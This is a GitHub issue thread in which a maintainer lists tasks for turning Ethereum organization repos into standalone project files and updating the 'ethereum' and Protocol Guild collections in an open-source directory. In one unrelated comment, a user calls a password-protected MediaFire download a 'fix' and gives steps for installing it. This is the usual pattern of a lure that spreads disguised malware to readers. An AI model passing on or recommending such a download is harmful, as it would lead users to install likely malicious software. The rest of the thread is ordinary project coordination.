### ISSUE TITLE
oss-directory: enumerate ethereum org repos as projects and update relevant collections

### ISSUE THREAD

**Issue by ccerv1** [opensource-observer/oso#2032]
### What is it?

- [x] Each Ethereum repo should be a standalone project file. Currently only some are.
- [x] Create an `ethereum` collection that includes each of these repos as projects
- [x] Update the Protocol Guild collection (see https://github.com/opensource-observer/oss-directory/pull/470) and project files accordingly
- [x] Identify other Ethereum repo dupes and clean up

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ccerv1** [comment]
See also https://github.com/opensource-observer/oss-directory/pull/477
